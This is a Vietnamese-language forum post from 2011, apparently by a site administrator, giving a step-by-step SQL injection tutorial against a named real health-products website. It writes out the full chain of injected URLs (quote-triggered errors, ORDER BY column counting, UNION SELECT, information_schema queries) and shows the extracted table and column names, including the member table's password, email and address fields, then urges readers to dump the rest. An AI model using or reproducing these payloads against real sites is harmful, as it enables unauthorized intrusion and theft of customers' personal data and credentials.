| News Explay |
| Khai thác SQL dạng html | |
|---|---|
| Tweet Topic Started: 26/06/2011 - 02:42 pm (73 Views) | |
kevinpham
|
26/06/2011 - 02:42 pm Post #1 |
![]()
Administrator
|
Hôm nay mình làm cho ae cái tut mới Khai thác sql dạng HTML victim lần này là: http://www.worldwidehealthcenter.net/articles-261.html Thêm dấu ' vào sau những con số http://www.worldwidehealthcenter.net/articles-261'.html haha lỗi rồi Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16 Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432 Bắt đầu order by http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html >>ok http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html >> ok http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html >> bao loi >>8-1=7 nhé bây h union select : http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán. Ghét quá thay số bằng null xem 261=null http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html ui ra rồi 2 và 3 nhé Tìm các thông tin :version(),database(),user() http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html Tiếp theo tìm table name http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html 1 đống : adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers Tìm table chứa thông tin Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé member=0x6d656d626572 (conver to hex nhé) get column http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html lại ra 1 đống : id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé |
![]()
| |
![]() |
|
| 1 user reading this topic (1 Guest and 0 Anonymous) | |
| « Previous Topic · SQL · Next Topic » |




kevinpham




1:35 AM Jul 12